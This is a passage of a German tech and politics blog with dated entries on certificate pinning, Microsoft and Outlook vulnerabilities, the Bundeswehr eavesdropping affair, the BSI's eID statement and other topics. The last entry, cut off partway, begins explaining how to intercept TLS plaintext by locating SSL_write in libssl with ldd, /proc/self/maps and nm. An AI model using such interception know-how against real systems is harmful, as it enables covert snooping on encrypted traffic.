Stattdessen findet man Hunderte von "Best Printer 2024" (immer mit Jahreszahl, das rankt höher!)-LLM-Generatorscheiße, schön mit "Test" und "Expert" drinnen, dann rankt das höher, aber selbstredend ohne Experten oder Tests.
Bei Brother hält der Toner vom Kauf gerne mal über die gesamte Lebensdauer des Druckers, Leute erzählen von 10 Jahren und mehr. Wenn man neuen Toner braucht, gibt es keine Abo-Drückerkolonnen wie bei HP, keine DRM-Scheiße wie bei HP, keine "Sie müssen jetzt den 90% vollen Toner tauschen, weil wir hier sonst zu wenig Profit machen" wie bei HP. HP hier stellvertretend für den Rest der Branche.
Ich will hier kein Lobeslied auf Brother feiern. Ich drucke pro Jahr vielleicht eine Seite und habe noch einen vorsintflutlichen Laserdrucker, den ich in einer Plastiktüte lagere, wo ich ihn für ein paar Minuten raushole, wenn ich mal was drucken muss.
Der Punkt ist eher, wie scheiße dieses ganze Ökosystem geworden ist. Das der Drucker, aber noch mehr das der Suchmaschinen und Contentfarmen. Zum Kotzen.
Die zweite Hälfte seines "Artikels" ist noch geiler, die hat er von Google Gemini generieren lassen. Der Artikel ist im Wesentlichen: Überschrift. Anreißer. "Kauft Brother". Und dann so "den Rest könnt ihr überspringen, der ist nur für Google" und das Gemini-Geblubber. Schön mit Triggerwörtern wir "Expert", klar. Für Google.
Wisst ihr noch, als Google für euch das Web besser gemacht hat? Damals?
Update: Einige Leser berichten, dass Brother jetzt auch Abos macht.

Wed Apr 3 2024

[l] Ihr habt ja wahrscheinlich von dem Gerichtsverfahren gegen Facebook gehört. Das hier. Sie haben ein VPN-Produkt in die Appstores getan, das ein Root-Zertifikat auf den Geräten installiert hat.
Damit haben sie dann in Snapchat, Youtube und Amazon-Webaufrufe reingeguckt, um ihre Konkurrenz zu analysieren.
Der eine oder andere von euch wird sich vielleicht gedacht haben: Aber ist nicht genau dafür Certificate Pinning gedacht, um sowas zu verhindern? Google hat doch sogar Werbung damit gemacht, dass sie böse Zertifikate erkennen, wenn Chrome zu Youtube oder einem anderen Google-Dienst verbinden will und ein Nicht-Google-Zertifikat sieht.
Was ist da also los?
Nun, nichts genaues weiß man nicht, aber eine Sache kann ich bei der Gelegenheit mal kurz erläutern: Cert Pinning schaltet sich ab, wenn man ein Root-Cert im Local Store hat, und dann das auf Pinning zu prüfende Zertifikat von dieser Root-CA signiert reinkommt.
Warum ist das so? Wegen Compliance-Bullshit. Ich wettere hier ja seit Jahrzehnten gegen Compliance-Bullshit, und dies ist ein schönes Beispiel dafür, wie Compliance-Bullshit Dinge für alle Menschen schlechter macht.
Für Banken und Versicherungen und Aktienbroker gibt es regulatorische Vorschriften, dass die ihren Traffic mitprotokollieren müssen, damit man danach Insider Trading nachweisen kann.
Kann man natürlich nicht. Also könnte man schon, macht man aber nicht. Wie auch alles andere Security-Theater hören die Aktivitäten bei "wir sammeln alle Daten ein" auf. Niemand guckt je in diese Daten rein.
Aber der Effekt ist, dass Banken ihren Mitarbeitern dann halt ein Root-Cert auf dem Gerät installieren. Und wenn Chrome dann immer meckern würde, dann müsste Google sich mit wütenden Kunden auseinandersetzen. Also schaltet man lieber Cert-Pinning ab.
Chrome macht das so. Firefox macht das auch so. Daher: Wenn euch jemand im lokalen Cert Store irgendwelche Root-Certs installiert, dann solltet ihr das immer ablehnen. Hier ist die Mozilla-Dokumentation zu dem Verhalten. Ctrl-F insert

Sat Mar 30 2024

[l] Die WHO hat eine neue Covid-Strategie publiziert. Die ist ... risikobasiert.
Foreword
We live immersed in an ocean of air, yet we hardly ever notice its presence. However, without air we would simply not be able to survive.
Da kannst du direkt zuklappen, aber widersteht dem Impulse mal noch kurz!
This manual comes at a time of unprecedented challenges, in the face of the ongoing COVID-19 pandemic and the existential threat of climate change.
Durchhalten!!
Risk-based standards, rather than absolute ventilation standards, will enable a more efficient use of our resources
Zeit für das Trommelsolo! Wir lassen uns am besten bei der nächsten Pandemie einmal durchseuchen. Dann wissen wir, wie das Virus reinkommt, und dann können wir "risikobasiert" ein bisschen Kosmetik ausrollen! Genial!
Scheiße, Bernd, wieso sind wir denn da nicht früher drauf gekommen?
Oh warte. Sind wir. Genau so lief das. Nur noch ein bisschen schlechter, weil man statt Messungen Wunschdenken gemacht hat. Die Schulen bleiben offen! Schulbusse sind kein Risikofaktor!
Gut so, denn so können sich die frisch infizierten Covid-Patienten vor den Schulen mit Microsofts "KI"-Mobil fortbilden!1!!
Endlich tut mal jemand was gegen Überbevölkerung und der Fefe ist schon wieder unzufrieden!1!!

Tue Mar 12 2024

[l] Wisst ihr noch, damals, als wir einen "Stresstest" der Banken gemacht haben? Was das für eine Farce war? Teilnahme war freiwillig und wir haben nur getestet, was wir dachten, was die Banken auch bestehen würden? Und am Ende sind die trotzdem reihenweise durchgefallen?
Boeing ist anscheinend bei über einem Drittel der Sicherheitstests der US-Luftfahrsbehörde FAA durchgefallen.
Ach. Ach was. Boeing? Ich dachte das ist so ein Inbegriff von Qualität und Verlässlichkeit?
Der Zulieferer Spirit AeroSystems, der den Rumpf für die MAX herstellt, habe nur sechs von dreizehn Audits bestanden, heißt es in dem Bericht weiter.
Nun, äh, vielleicht sollte man den Laden mal zumachen?

Wed Mar 6 2024

[l] An der Frage, ob der Übergang zwischen Admin im Userspace und Kernel eine Security Boundary (und damit valide Angriffsoberfläche) ist, scheiden sich seit Jahrzehnten die Geister.
Früher war die Argumentation immer: root kann /dev/kmem aufmachen und die Platte formatieren, das ist äquivalent zu Kernel-Zugriff. Genau so unter Windows: Admin kann Kernelmodule laden, ist daher äquivalent zu Kernel.
Später hat sich das dann langsam geändert, als Code Signing für Kernelmodule eingeführt und später erzwungen wurde. Ich habe aber schon vor 20 Jahren mit Microsoft verhandelt, dass das eine Security Boundary sein soll, bevor das mandatory war.
Inzwischen kann Admin nicht mehr einfach irgendwelche Module laden, sondern nur noch solche mit valider Signatur. Das ist aus meiner Sicht das Ende der Debatte, denn offensichtlich handelt es sich jetzt um eine Security Barrier.
Ich habe damit ein paar Bugfixes durch-gebullyt gekriegt (am Ende entscheidet nicht die Policy sondern der einzelne Entwickler, ob der Bug gefixt wird; niemand hindert einen Entwickler am Fixen eines Bugs, auch wenn die Policy den nicht so schlimm findet). Aber die offizielle Policy wurde nie geändert.
Das führte zu bekloppten Situationen wie dass die fiesen Ransomwarer eine Lücke aktiv ausnutzen, um von Admin zu Kernel zu kommen, und Microsoft weigert sich die zu fixen, weil die Policy sagt, Admin = Kernel. Nach sechs Monaten (!) haben sie die Lücke jetzt doch zugemacht.
Immer dran denken: DAS sind die Leute, die ihr eure Klöten halten lasst, in deren Cloud ihr eure Kronjuwelen migriert habt.

Tue Mar 5 2024

[l] Das Verteidigungsministerium hat einen Sinn für Humor und lädt eine Mitteilung des Verteidigungsministers zur Abhöraffäre hoch.
Auf eine experimentelle Nextcloud-Instanz der Bundeswehr, "(c) 2024 Pilotumgebung Link and More". Gestern stand da auch noch "s6 dev gru" und "b0rn 2 l33t". Nein, wirklich. Das stand da.
Und aus Sicherheitsgründen ist das passwortgesichert. Mit dem Passwort "1234".
Wer jetzt ein PDF erwartet, sieht sich getäuscht. Da kommt ein MP3. Mit einer Audioqualität, bei der jeder Podcaster oder Youtuber staunt, dass sich jemand damit ans Internet traut.
Bei allem Gelächter über die Bundeswehr ist das eher ein Zeichen dafür, was für eine Compliance-Hölle die Bundeswehr ist, und spricht eher dafür, dass das per Telefon einwählen Absicht war, damit die Russen das mitschneiden.
Dass die 1234 als Passwort setzen, zeigt, dass sie aus Compliance-Gründen die Plattform so eingerichtet haben, dass alles mit Passwort geschützt werden muss.
Dass sie uns die Plattform überhaupt zeigen, zeigt, dass sie die schon vorher hatten. So unseriös dieses "b0rn 2 l33t" auch aussieht: Die Bundeswehr ist eine lahmarschige, träge Bundesbehörde. Die setzt nicht über Nacht ein Nextcloud auf. Dem ging wahrscheinlich ein monatelanges Beschaffungsverfahren voraus.
Dass das unter bundeswehr.de liegt statt unter bund.de oder bmvg.de ist ein Zeichen, dass sie uns Handlungsfähigkeit demonstrieren wollen, und uns versichern wollen, dass das wirklich von ihnen ist und kein russisches Deepfake.
Unter dem Strich wirkt das alles wie "gut gemeint, schlecht gemacht". Besser wäre gewesen, wenn sie auf ihrer Webseite den Text als HTML gehabt hätten, anstatt auf ein mp3 zu linken. Das wäre barrierefrei gewesen, hätte die Leute nicht mit diesem l33t-Scheiß verunsichert, und da wäre auch niemand auf die Idee gekommen, dass die Russen die Bundeswehr-Webseite manipuliert haben.
Ist ein Nextcloud denn jetzt sicher? Nun ja. Kommt auf die Perspektive an. Auf der einen Seite ist das natürlich besser, wenn man Kram in seiner eigenen Infrastruktur hostet, anstatt in einer amerikanischen Cloud. Auf der anderen Seite hat man dann Verantwortung, der man auch nachkommen muss. Genau wie alle anderen Cloudumgebungen ist Nextcloud viel zu komplex, um eine Fehlerfreiheit anzunehmen. Da muss man dann ordentlich patchen und monitoren. Wer weiß, wie viele Nextcloud-Anwender das auch tatsächlich tun. Ich bin nicht optimistisch.
Wenn jemand einen Link auf eine Nextcloud-Umgebung mit dem Internet teilt, ist das jedenfalls grundsätzlich ein schlechtes Zeichen. Solche Dateien gehören auf den Webserver. Nextcloud hat eine riesige Angriffsoberfläche. Die sollte man so wenig wie möglich in Richtung Internet exponieren.

Sun Mar 3 2024

[l] Zu der Webex-Nummer noch ein paar Gedanken.
Erstens kann Webex natürlich Verschlüsselung.
Zweitens hat sich hier offenbar jemand per Analog-Telefon aus Singapur in die Webex-Konferenz eingewählt. Das klingt dermaßen bescheuert, dass ich mich langsam für die Theorie erwärmen kann, dass es sich um einen Trick handelt, dass man den Russen was mitteilen wollte, also hat man möglichst so kommuniziert, dass die das auf jeden Fall mitschneiden. Und man spricht das in dem Gespräch auch noch explizit an, um nicht Webex in der Bundeswehr grundsätzlich zu beschädigen.
In Kriegen kann man keiner Seite trauen. Am Ende ist für mich die wahrscheinlichste Erklärung die, bei der alle gemacht haben, was aus ihrer Sicht am besten schien. Gucken wir doch mal.
Die Bundeswehr möchte gerne den Russen eine Nachricht schicken, aber wollen nicht, dass die Russen vermuten, dass sie hier verarscht werden. Die Botschaft ist: Taurus ist lieferbereit und einsatzfähig und wäre eine echte Bedrohung für die Russen. Damit die Russen das glauben, erwähnt man auch ein paar Nachteile.
Dafür wäre das in der Tat der sinnvollste Weg gewesen, aber es ist eine Gratwanderung. Auf der einen Seite will man ja den Russen nicht den Eindruck geben, dass ihnen hier Material gefüttert wird. Es darf also nicht zu offensichtlich sein. Auf der anderen Seite will man ja sicherstellen, dass die Russen das auf jeden Fall mitkriegen. Dann muss man im Gespräch erwähnen, dass einer der Teilnehmer per Telefon aus dem Hotel in Singapur einwählt, damit nicht Webex in der Bundeswehr grundsätzlich kaputt ist. Das klingt schon plausibel als Szenario.
Nächster Schritt: Die Russen fangen das ab. Natürlich fangen die das ab. Kriegsparteien fangen alles ab, was sie können, und die Russen haben schon mehrfach abgefangene Telefonate geleakt.
Aus deren Sicht ist es jetzt der beste Spielzug, das zu veröffentlichen, um die Deutschen öffentlich als Idioten darzustellen. Aus deren Sicht ist das ja keine neue Information, dass die Krimbrücke angreifbar ist. Tatsächlich ist die zufällig heute spontan für den Autoverkehr gesperrt worden, nachdem ukrainische Medien von Explosionen berichtet haben. Aus Sicht der Russen spräche dagegen, wenn sie damit ihre Abhörfähigkeiten offenlegen müssten, wo der Westen noch nicht weiß, dass sie welche haben. Das ist in dem Fall kein Problem wegen der Einwahl aus Singapur. Der Westen weiß jetzt immer noch nicht sicher, ob die Russen Webex mithören können oder nicht. Und dass die Russen Telefone abhören können, ist seit langem bekannt.
Bleibt die Ukraine. Aus deren Sicht ist es jetzt am besten, wenn es Explosionen an der Krimbrücke gibt, damit es so aussieht, als seien sie auch ohne Taurus einsatzfähig und könnten die Russen ernsthaft bedrohen.
Und dann gibt es noch ein bisschen Opportunismus aus der CDU, die das jetzt als Problem von Olaf Scholz hinstellt. Klar, das sind halt Deppen und ihre Wähler sind auch Deppen, die lügen jetzt halt ein bisschen rum, wie sie immer herumlügen. Besonders ärgert mich an der CDU ja immer, wie sie jetzt gaslighting machen, dass Scholz die Bundeswehr in den Zustand gebracht hat, wenn es lange Jahre der CDU-Misswirtschaft waren.
Aus Sicht der Ampel ist der beste Move, in den Medien zwei Narrative unterzurbringen: Die Bundeswehr braucht mehr Geld (Rechtfertigung für das umstrittene Sondervermögen), die Bundeswehr ist inkompetent (man will immer vom Feind unterschätzt werden) und die fiesen Russen hören uns ab.
Aus Sicht der Medien ist der sensationellste Spin, sich darauf zu konzentrieren, dass die bösen Russen uns abhören. Das ist sensationeller als Taurus an die Ukraine.
Was spricht gegen diese Theorie? Es könnte natürlich auch wirklich Verkacken gewesen sein bei der Bundeswehr. Klar. Aber die Bundeswehr ist eine Verwaltung. Verwaltungen können eigentlich nur eines zuverlässig: Compliance-Theater. Dazu ein Leserbrief von einem Insider:
und ich darf an der Bundeswehr-Uni nichtmal eine 0815 Vorlesung/Übung über WebEx halten.
Die Bundeswehr selbst betreibt übrigens ein WebEx, dass explizit nicht für Konferenzen mit vertraulichen Daten zugelassen ist (vertraulich bedeutet nicht Eingestuft nach Verschlusssachenanweisung).
Die BWI GmbH (das ist ein wahres Moloch) stellt das WebEx zur Verfügung, mit dem auch eingestufte Daten in Konferenzen ausgetauscht werden. Sowas wird in der Regel vom BSI ( :) ) oder von der DEUmilSAA "abgenommen".
Ein anderer Leser weist darauf hin, dass die Bundeswehr längst Open-Source-Alternativen zu Webex im Einsatz hat.
Update: Kiesewetter sagt, die Russen hätten Zugangsdaten gehabt. Der Mitschnitt klingt von der Qualität wie ein Streamdump. Insofern klingt das plausibel. Es würde auch erklären, wieso Russen das ganze für eine Falle gehalten und veröffentlicht haben, als der Typ da im Stream erklärt, er wähle sich per Telefon aus Singapur ein. Ändert an dem Rest der Bewertung nicht viel.
Update: Hmm, der Mitschnitt beginnt aber schon, bevor der Typ aus Singapur dazukommt. Insofern kann das nicht der Weg sein, über den sie das abgehört haben.

Sat Mar 2 2024

[l] Bundesregierung bestätigt Abhörvorgang durch die Russen.
Aber das ist nicht das wichtige Detail an der Stelle. War eh klar. Das hier finde ich das wichtigere Detail:
Kanzler Olaf Scholz Scholz (SPD), der am Vormittag in Rom eine Privataudienz beim Papst hatte, zeigte sich nach Bekanntwerden des Spionagefalls besorgt
Wie meinen? wieso hat denn bitte unser Bundeskanzler eine Privataudienz beim Papst?!
Was setzt denn das bitte für einen Präzedenzfall? Als nächstes dann "... der gerade mit einem Wünschelrutengänger das Kanzleramt ablief, um die beste Lieferroute für Homöopathiepräparate für die Ukraine zu finden, ..." oder was? Wieso nicht gleich ein Medium befragen!
Was haben die da bitte gemacht in Rom? Gemeinsam die Russen weggebetet?!?
Mann Mann Mann

Fri Mar 1 2024

[l] Einer der größten Irrtümer in der IT ist, dass eine Firma, die sich auf etwas spezialisiert hat, und das als Dienstleistung anbietet, das dann besser oder gewissenhafter macht als man es selber gemacht hätte.
Nein. Tun sie nicht.
Die sind nicht darauf spezialisiert, etwas gut zu machen, sondern etwas billig zu machen. Das Ziel von Firmen im Kapitalismus ist die Profitmaximierung.
Die Erfahrung zeigt deutlich in die Gegenrichtung.
A technology company that routes millions of SMS text messages across the world has secured an exposed database that was spilling one-time security codes that may have granted users’ access to their Facebook, Google and TikTok accounts.
Instinktiv könnte man vielleicht annehmen, dass eine Firma, die nur MFA-SMS zustellen soll, da nicht viel falsch machen kann. Aber das stimmt halt nicht.
Genau so ist das mit "der Cloud" und mit "die verwalten unsere Telefonanlage" und allem anderen in der IT da draußen.
Du brauchst auf jeden Fall genug Kompetenz in-house, um selber prüfen zu können, ob du gerade verarscht wirst. In den meisten Fällen kannst du dir dann den Mittelsmann auch gleich sparen und deren Profitmarge und kommst unter dem Strich billiger bei weg.

Wed Feb 28 2024

[l] Die Verbraucherzentrale Hessen hat operationelle Herausforderungen.
ENDLICH! Das ist der Moment, auf den wir alle gewartet haben! Wo mal jemand Microsoft in Haftung nimmt!!
Ich meine, das machen die beruflich, bei der Verbraucherzentrale. Das werden die jetzt tun, oder? Oder etwa nicht?!?
Update: Ein Leser hat daraus ein Mem-Gif gemacht, für die Jüngeren unter euch :-)

Tue Feb 27 2024

[l] Leserbrief eines Lokführers zu den Ersatzzügen bei der Bahn:
So ein "Ersatzzug" kann mehrere Ursachen haben. Grundsätzlich gilt, dass jede Zugnummer im Netz innerhalb der 24 Stunden eines Tages nur einmal vergeben werden darf und/oder bei einem Fahrtverlauf über 0:00 Uhr hinweg so verlaufen muss, dass dieser Zug nicht gleichzeitig unter derselben Nummer verkehren kann.
Wird dann bei Betriebsstörungen ein Brechen des Zuglaufs erforderlich, kann der andere Zug im Verlauf nicht mit derselben Nummer verkehren, sondern bekommt eine neue Zugnummer als Ersatz.
Dann gibt es noch Fälle, wo ein Zug z.B. nicht durch ein passendes Fahrzeug gefahren werden kann. Für jeden Zug gibt es seitens des Bestellers und der Trasse/Netz bestimmte Voraussetzungen wie Höchstgeschwindigkeit, Zuglänge, Bremsprozente usw. Werden diese Werte durch das andere Fahrzeug nicht eingehalten/nicht erreicht, dann muss auch dafür beim Netz eine andere Nummer bestellt werden. Dabei spielt es keine Rolle, ob durch Fahrplanpuffer usw. die Zeiten eingehalten werden oder nicht. Das Doofe daran ist dann, dass bei so etwas der Originalzug statistisch und in den EDV-Systemen "ausfällt", dafür aber eben besagter Ersatzzug unter anderer Nummer in denselben Fahrzeiten verkehrt. Leider ist das System dahinter so idiotisch, dass es diesen Punkt auch genauso darstellt, anstatt einfach nach draußen zu vermitteln, dass der Zug einfach unter einer anderen Nummer verkehrt.
Im Freiburger Raum handelt es sich quasi um ein S-Bahn-Netz mit hoher Taktdichte. Wenn dort etwas hakt, sind 5 Minuten eine lange Zeit und es kann also sein, dass dispositiv so ein Zuglauf an einer bestimmten Stelle beendet wird, weil inzwischen schon der nächste Takt um die Ecke kommt und damit nicht das gesamte Netz "kaputt gemacht" wird durch so eine verkeilte Fuhre.
Der "Ersatzzug" kam dann vielleicht daher, dass an einer Stelle im Zuglauf sowieso ein Ablösen des Personals stattgefunden hätte und noch blödererweise sogar ein Fahrzeug vorhanden war, mit dem dann dort in den Umlauf wieder eingestiegen werden konnte (ich meine, dass das bei solchen S-Bahnen und teils auch im Fernverkehr tatsächlich so ist, dass wegen der Taktdichte an Wendebahnhöfen Ersatzfahrzeuge und u.U. Bereitschaftspersonale vorgehalten werden). Bei Regio war das auch mal so üblich, aber das wurde zumindest mit planmäßigen Bereitschaften aus Kosten- und Personalgründen inzwischen stark reduziert). Dann gilt der Ansatz mit den zwei Zügen und derselben Zugnummer. Oder der erste Zugteil ist gar nicht gefahren und daher konnte dann der noch bediente Abschnitt sogar mit der planmäßigen Nummer gefahren werden. Wie das im jeweiligen Fall gelöst wurde/wird, ist immer situationsabhängig und da kann man logisch nicht immer erst einen Stuhlkreis bilden, sondern muss dann halt den Finger ziehen ;-)
[l] Lacher des Tages:
Die Bürokratie hat laut der Bundesregierung in den vergangenen zehn Jahren teils deutlich zugenommen.
Wartet! Das war noch nicht der Lacher. Hier ist der Lacher:
Das Justizministerium will gegen einen weiteren Anstieg vorgehen. Auch die Wirtschaft soll bald entlastet werden.
Genau die Worte der vorherigen Justizministerien und Regierungen, die uns in diese Lage gebracht haben.
Das muss mal weggeschmissen und neu gemacht werden. Mit "Reformen" wird das bloß immer schlimmer.

Fri Feb 23 2024

[l] Während ich hier im Blog vor allem gegen Autobauer, Bankster und Ölkonzerne hate, gibt es noch eine andere Branche, die unser aller Missgunst verdient hat: Versicherungen.
Seit ich denken kann sind die alle so gut wie pleite, alles wird immer teurer, die Schäden immer höher, wir müssen dringend die Prämien erhöhen. Und dann liest man sowas hier:
Die Allianz hat im vergangenen Jahr 14,7 Milliarden Euro verdient - ein Rekordgewinn. Unwetterschäden und die Inflation haben zur Folge, dass Kunden höhere Prämien zahlen müssen.
Ach. Ach was. Unwetterschäden und Inflation haben denen gar nicht den Profit aufgerieben sondern die haben Rekordprofite?
Die Allianz hat fast ein Drittel mehr Gewinn gemacht als noch im Vorjahr, was den Konzernchef Oliver Bäte zufrieden stimmt.
Und wo kamen die Profite hergesprudelt? Kommt ihr NIE drauf!
Zum Rekordgewinn trug im Gesamtjahr vor allem das Geschäft mit Lebens- und Krankenversicherungen bei.
Ach. Ach was. Die Krankenversicherungen? Ist nicht wahr!
Der Gewinn hätte noch höher ausfallen können, wenn nicht vergangenen Sommer das Tief Zacharias und einige weitere Stürme erhebliche Schäden verursacht hätten.
Warum ist das eigentlich so? Kann mir das mal kurz jemand erläutern? Wieso hätte der Profit noch höher ausfallen können? Wieso dürfen Versicherungen überhaupt so viel Profit machen?! Hier und da mal ein paar Euro, die man für schlechte Zeiten zurücklegt, geschenkt. Aber in schlechten Zeiten Rekordprofite einfahren? Kann mir das mal jemand erklären? Wieso unsere Gesellschaft das mit sich tun lässt?
Oh und: Ich sagte zurücklegen. Legt die Allianz denn was zurück? Für harte Zeiten? Nicht doch, mein Herr!
Die Allianz verwöhnt ihre Aktionäre traditionell mit einer hohen Dividende, die ebenfalls immer wieder in der Öffentlichkeit kritisch diskutiert wird. Für das vergangene Jahr wird sie von 11,40 Euro auf 13,80 Euro je Aktie angehoben.
OK, Dividende. Immerhin. Könnte noch schlimmer sein. Könnte Aktienrückkauf sein.
Zusätzlich wird zum wiederholten Male ein Aktienrückkaufprogramm mit einem Volumen von einer Milliarde Euro aufgelegt.
*augenroll*

Fri Feb 16 2024

[l] OK, der ursprüngliche Artikel war schon lang, daher hier einen neuen.
Das BSI äußert sich zur eID-Nummer. Das ist ein Feuerwerk aus sorgfältig formulierter Krisen-PR, ein Windbeutel neben der nächsten Nebelwand, eingebettet in ein Laken aus Nullaussagen.
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) bestätigt, dass es von einem IT-Sicherheitsforscher auf eine vermeintliche Schwachstelle im eID-System hingewiesen wurde.
Das "vermeintlich" ist eine Frechheit. Wenn sie geschrieben hätten "in der eID-App", dann hätte man hier verhandeln können. So ist das schlicht eine dreiste Unterstellung und eine Frechheit. Das ist eine tatsächliche Sicherheitslücke, und das BSI trägt die Verantwortung, weil sie die App für die Plattform hätten verhindern können, aber es nicht getan haben.
Im Ergebnis betont das BSI: Es handelt sich bei dem beschriebenen Szenario nicht um einen Angriff auf das eID-System selbst oder eine Schwachstelle in den zugehörigen Sicherheitsfunktionen.
Ja, äh, doch! Genau das ist es! Wenn du eine App für Apple-Geräte baust, und die Sicherheitsgarantien macht, die sie nicht einhalten kann, dann ist das eine Lücke im System. Auch wenn deine App nicht Schuld ist.
Das BSI sieht weiterhin keine Änderung in der Risikobewertung bei der Nutzung der Online-Ausweisfunktion.
Das ist eine Bankrotterklärung des BSI. Sie sagen uns hier: Ja gut, dass man daran sterben kann, das, äh, das wussten wir die ganze Zeit und das war absichtlich so durchgewunken (weil wir sonst zugeben müssten, dass wir völlig inkompetente Tester sind und unsere Risikobewertungen nicht das Papier wert sind, auf dem wir sie ausdrucken). Das ist wie wenn Donald Trump sagt, dass er absichtlich Nancy Pelosi und Nikki Haley verwechselt.
Um die Online-Ausweisfunktion des Personalausweises missbräuchlich verwenden zu können, ist ein mehrstufiger Cyberangriff auf ein mobiles Endgerät der Anwenderinnen und Anwender erforderlich.
Lassen Sie mich nochmal die ENORME KRIMINELLE ENERGIE betonen, die jemand aufbringen müsste, um Sie zu hacken! Der Angreifer müsste Sie dazu bringen, dass Sie eine App installieren!1!! So wie es z.B. alle Supermarktketten erfolgreich tun, und die Deutsche Bahn. Und Behörden (KATWARN, NINA). Eine IMMENSE kriminelle Energie also!!1!
Dazu muss das mobile Gerät entweder vollständig kompromittiert werden oder die Anwenderinnen und Anwender müssen aktiv eine entsprechend manipulierte App installieren.
Kommt, guckt mal kurz auf einer Smartphone, wie viele Apps ihr aktuell installiert habt. Dreistellig? Vierstellig?
Des Weiteren ist es bei jedem einzelnen Angriffsvorgang notwendig, den Ausweis physisch an der NFC-Schnittstelle zu platzieren. Ein vergleichbarer Angriff wäre auch bei zahlreichen weiteren Online-Diensten denkbar.
Niemand würde niemals nie nicht sein Telefon in der Nähe seiner Geldbörse aufbewahren!!1! Und außerdem ist Paypal ja auch unsicher. Wer also einen Hauskauf mit der Paypal-App signiert, der sollte mal über sein Risikoprofil nachdenken!1!!
Aus Sicht des BSI sind grundlegende Sicherheitsmaßnahmen der Anwenderinnen und Anwender ausreichend, um einen erfolgreichen Angriff unmöglich zu machen. Dazu zählen die Verwendung aktueller Soft- und Firmware und die Verwendung legitimer Apps aus vertrauenswürdigen Quellen. Das BSI empfiehlt die Verwendung von durch das BSI zertifizierten Apps wie z.B. der AusweisApp, die kostenfrei durch den Bund zur Verfügung gestellt wird.
Die andere App kam aus dem App Store. Das ist eine vertrauenswürdige Quelle. Das sind peinliche Nebelkerzen hier gerade.
Das BSI prüft zudem, mit welchen zusätzlichen Maßnahmen die Nutzung der Online-Ausweisfunktion noch sicherer gestaltet werden kann.
"Das BSI prüft" ist das neue "der Verfassungsschutz beobachtet", ja? Absolut grotesk. Es gab keinen Angriff. Wenn es ihn gab, dann war immense kriminelle Energie nötig. Wir haben nichts falsch gemacht! Aber wir gucken jetzt mal, ob wir was besser machen könnten. Das ist wie bei Calvin & Hobbes!
Lange las ich nicht mehr etwas so peinliches wie diese Presseerklärung vom BSI. *fremdschäm*

Thu Feb 15 2024

[l] Benutzt hier jemand Outlook?
Ich habe kein Mitleid. Ich habe euch alle ausreichend gewarnt.
Es handelt sich um ein zero click pre-auth remote code execution, d.h. wurmbar.
Microsoft hampelt jetzt rum, ob das bereits exploitet wird oder nicht. Kann mir keiner erzählen, dass das nicht in null komma nichts exploitet wird.
Viel Spaß beim Aufwischen!
Hey, wenn euch eure Cyberversicherungen nicht auszahlen, muss dann vielleicht doch mal irgendwann Microsoft haften für die verkackte Software, die sie euch verkauft haben? Würde mich ja wundern. Ich glaube langsam, ihr WOLLT alle ständig über Microsoft-Lücken exploitet werden. Damit endlich mal nicht ihr Schuld seid sondern der Mann im Mond, äh, in Redmond.
Hey, wieso migriert ihr nicht in die Cloud? Am besten die von Microsoft!! Danach könnt ihr mir ja was erzählen von dass das damals ja alle gemacht haben, als ob das irgendwas an eurem Versagen ändert.

Mon Feb 12 2024

[l] Benutzt hier jemand Postgres?
Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer.
In der Praxis wird das vermutlich kaum jemanden betreffen, weil außer mir niemand verschiedene Berechtigungen in Datenbanken vergibt, sondern lieber ein "technischer User" genommen wird.
Und ich verwende kein Postgres, bin daher also auch nicht betroffen.
Aber lasst euch davon nicht vom Patchen abhalten. Alle Patches einspielen.
Update: Im Übrigen sei an der Stelle der Hinweis erlaubt, dass Postgres sich hier geradezu vorbildlich und professionell verhalten hat. Sie haben nicht rumgelogen oder runtergespielt, sie haben nicht von krimineller Energie der Angreifer gefaselt, die haben schnell Patches gemacht, und zwar für alle Versionen, und sie wollten kein Geld für Support abgreifen. Wenn mich mal jemand nach einer SQL-Datenbank-Empfehlung fragt, empfehle ich immer Postgres. Da hatte ich bisher auf jedem Schritt den Eindruck, dass das Erwachsene betreiben und verwalten, und da niemand bloß Selbstdarstellung oder Spendenabgreifen macht.

Thu Feb 8 2024

[l] Kennt ihr das Wort "immanentisieren"? Nehmen wir mal an, ihr wohnt auf Island. Natürlich wisst ihr die ganze Zeit, dass da ein Vulkan ausbrechen könnte. Aber wenn der dann ausbricht, dann ändert das trotzdem auf einen Schlag die Situation grundlegend.
Oder nehmen wir an, ihr kennt euch mit Computer-Architektur aus. Ihr wisst, dass es einen Kernel gibt, und der kann Userspace-Programme laufen lassen, und stellt denen virtuellen Speicher zur Verfügung und Syscalls und so weiter. Natürlich wisst ihr, dass der Kernel grundsätzlich in den Speicher der Prozesse reingucken kann.
Wenn ihr also, sagen wir mal, curl benutzt, und der spricht SSL mit einem Gegenüber, dann kann der Kernel grundsätzlich in den Speicher gucken und die unverschlüsselten Daten sehen. Da wird jetzt niemand wirklich überrascht sein, dass das so ist, hoffe ich.
Aber die Details waren bisher nicht so attraktiv. Das war mit Aufwand verbunden. OK, du kannst gucken, welche SSL-Library der benutzt, und da stattdessen eine Version mit Backdoor einblenden als Kernel. Oder du könntest die Offsets von SSL_read und SSL_write raussuchen und dann da Breakpoints setzen, wie bei den Debugging-APIs, und dann halt reingucken. Du hättest potentiell auch mit Races zu tun. Du müsstest wissen, wie man aus einer Shared Library die Offsets von Funktionen rausholt.
Gut, aber dann denkst du da ein bisschen drüber nach, und plötzlich sieht das gar nicht mehr so schwierig aus. curl lädt openssl als dynamische Library.
```
$ ldd =curl
	linux-vdso.so.1 (0x00007ffff7dd2000)
	libcurl.so.4 => /usr/lib64/libcurl.so.4 (0x00007f1df4c66000)
	libssl.so.3 => /usr/lib64/libssl.so.3 (0x00007f1df4b6f000)
[...]
```
Da sieht man schon, dass die Adressen irgendwie krumm aussehen. Das ist ASLR. Wenn du nochmal ldd machst, kriegst du andere Adressen. OK aber warte. Die Daten hat der Kernel ja, und exponiert sie sogar an den Userspace:
```
$ cat /proc/self/maps
[...]
7f846a8d2000-7f846aa27000 r-xp 00028000 00:14 5818768                    /lib64/libc.so.6
```
Und innerhalb des Adressbereichs, an den so eine Library gemappt wird, bleibt das Offset von SSL_write ja konstant. Wie finden wir das? Nun, da gibt es Tooling for:
```
$ nm -D /usr/lib64/libssl.so.3 | grep SSL_write
0000000000035660 T SSL_write@@OPENSSL_3.0.0
```
